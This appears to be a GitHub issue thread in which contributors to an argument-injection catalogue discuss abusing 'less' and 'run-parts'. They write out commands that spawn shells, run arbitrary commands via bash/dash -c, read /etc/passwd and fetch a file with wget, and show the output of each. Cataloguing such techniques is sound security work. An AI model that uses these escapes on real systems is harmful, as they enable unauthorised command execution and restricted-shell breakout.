Contributing and Distinction from GTFOBins

[superswan]

Hello, I would like to make a few contributions, but it's hard for me to determine if it truly falls under "Argument/Parameter injection". I get the concept but I'm not sure there is much distinction between this sort of thing and more general GTFOBins/LOLBin abuse. Here are some examples.

Spawning a shell with less
Here file.txt would contain the command to be run for example "/bin/sh"

LESSOPEN="|/bin/sh %s" less file.txt

Spawning a shell with run-parts
run-parts --new-session --regex '^sh$' /bin

[MegaManSec]

Hey @superswan,
I am sorry for taking so long to reply, I apparently forgot to turn notifications on for this project.

I think the first case isn't really an argument injection because setting an environmental variable like that isn't an argument for the program (less) itself.

As for run-parts, it certainly qualifies. Can you give some examples of using it to execute an arbitrary command, rather than spawn a shell?

[bcoles]

As for run-parts, it certainly qualifies. Can you give some examples of using it to execute an arbitrary command, rather than spawn a shell?

You can use STDIN.

$ echo id | run-parts --regex '^sh$' /usr/bin 
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),
114(lpadmin),134(sambashare)

Alternatively, executing a command depends on which shell is used. The following examples use -c to execute a command.

Execute a command with Dash (run /usr/bin/dash -c "/usr/bin/id"):

$ run-parts --new-session --regex '^dash$' /usr/bin -a "-c" -a /usr/bin/id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),
114(lpadmin),134(sambashare)

Execute a command with Bash (run /usr/bin/bash -c "/usr/bin/id"):

$ run-parts --new-session --regex '^bash$' /usr/bin -a "-c" -a "/usr/bin/id"
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),
114(lpadmin),134(sambashare)

Execute a sequence of commands (run /usr/bin/bash -c "echo hello > /tmp/hello ; ls -la /tmp/hello ; cat /tmp/hello"):

$ run-parts --regex '^bash$' /usr/bin -a "-c" -a "echo hello > /tmp/hello ; ls -la /tmp/hello ; cat /tmp/hello"
-rw-r--r-- 1 user user 6 Dec 23 08:57 /tmp/hello
hello

Read a file (run /usr/bin/cat /etc/passwd):

$ run-parts --regex '^cat$' /usr/bin -a "/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
[...]

Download a file (run /usr/bin/wget https://example.com):

$ run-parts --regex '^wget$' /usr/bin -a "https://example.com"
--2023-12-23 18:16:28--  https://example.com/
Resolving example.com (example.com)... 93.184.216.34, 2606:2800:220:1:248:1893:25c8:1946
Connecting to example.com (example.com)|93.184.216.34|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1256 (1.2K) [text/html]
Saving to: 'index.html’

index.html                                          100%[===================================================================================================================>]   1.23K  --.-KB/s    in 0s      

2023-12-23 18:16:29 (76.5 MB/s) - 'index.html’ saved [1256/1256]

[MegaManSec]

Great, I will make an .md for it soon.